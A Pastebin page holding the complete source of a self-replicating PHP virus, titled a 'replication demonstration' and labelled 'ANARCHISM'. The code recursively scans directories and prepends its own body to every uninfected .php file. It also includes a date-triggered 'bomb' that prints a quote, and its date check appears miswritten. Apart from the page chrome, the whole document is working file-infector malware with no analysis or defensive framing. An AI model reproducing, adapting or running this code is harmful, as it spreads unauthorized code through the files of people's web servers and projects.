Advertisement
FlyFar

Replication Demonstration - PHP

Jul 4th, 2023
598
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.57 KB | Cybersecurity | 0 0
  1. <?php
  2. define("SIGNATURE", "ANARCHISM");
  3. // determine whether backslash or forward slashes are used
  4. define("SLASH", stristr($_SERVER['PWD'], "/") ? "/" : "\\");
  5. $linenumber = __LINE__;
  6. define("STARTLINE",$linenumber-4);
  7. define("ENDLINE",$linenumber+45);
  8. function search($path){
  9.     $ret = "";
  10.     $fp = opendir($path);
  11.     while($f = readdir($fp)){
  12.         if( preg_match("#^\.+$#", $f) ) continue; // ignore symbolic links
  13.         $file_full_path = $path.SLASH.$f;
  14.         if(is_dir($file_full_path)) { // if it's a directory, recurse
  15.             $ret .= search($file_full_path);
  16.         } else if( !stristr(file_get_contents($file_full_path), SIGNATURE) ) { // search for uninfected files to infect
  17.             $ret .= $file_full_path."\n";
  18.         }
  19.     }
  20.     return $ret;
  21. }
  22. function infect($filestoinfect){
  23.     $handle = @fopen(__FILE__, "r");
  24.     $counter = 1;
  25.     $virusstring = "";
  26.     while(($buffer=fgets($handle,4096)) !== false){
  27.         if($counter>=STARTLINE && $counter<=ENDLINE){
  28.             $virusstring .= $buffer;
  29.         }
  30.         $counter++;
  31.     }
  32.     fclose($handle);
  33.     $filesarray = array();
  34.     $filesarray = explode("\n",$filestoinfect);
  35.     foreach($filesarray AS $v){
  36.         if(substr($v,-4)===".php"){
  37.             $filecontents = file_get_contents($v);
  38.             file_put_contents($v,$virusstring.$filecontents);
  39.         }
  40.     }
  41. }
  42. function bomb(){
  43.     if(date("md") == 0125){
  44.         echo "Anarchism is democracy taken seriously - Edward Abbey";
  45.     }
  46. }
  47. $filestoinfect = search(__DIR__);
  48. infect($filestoinfect);
  49. bomb();
  50. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement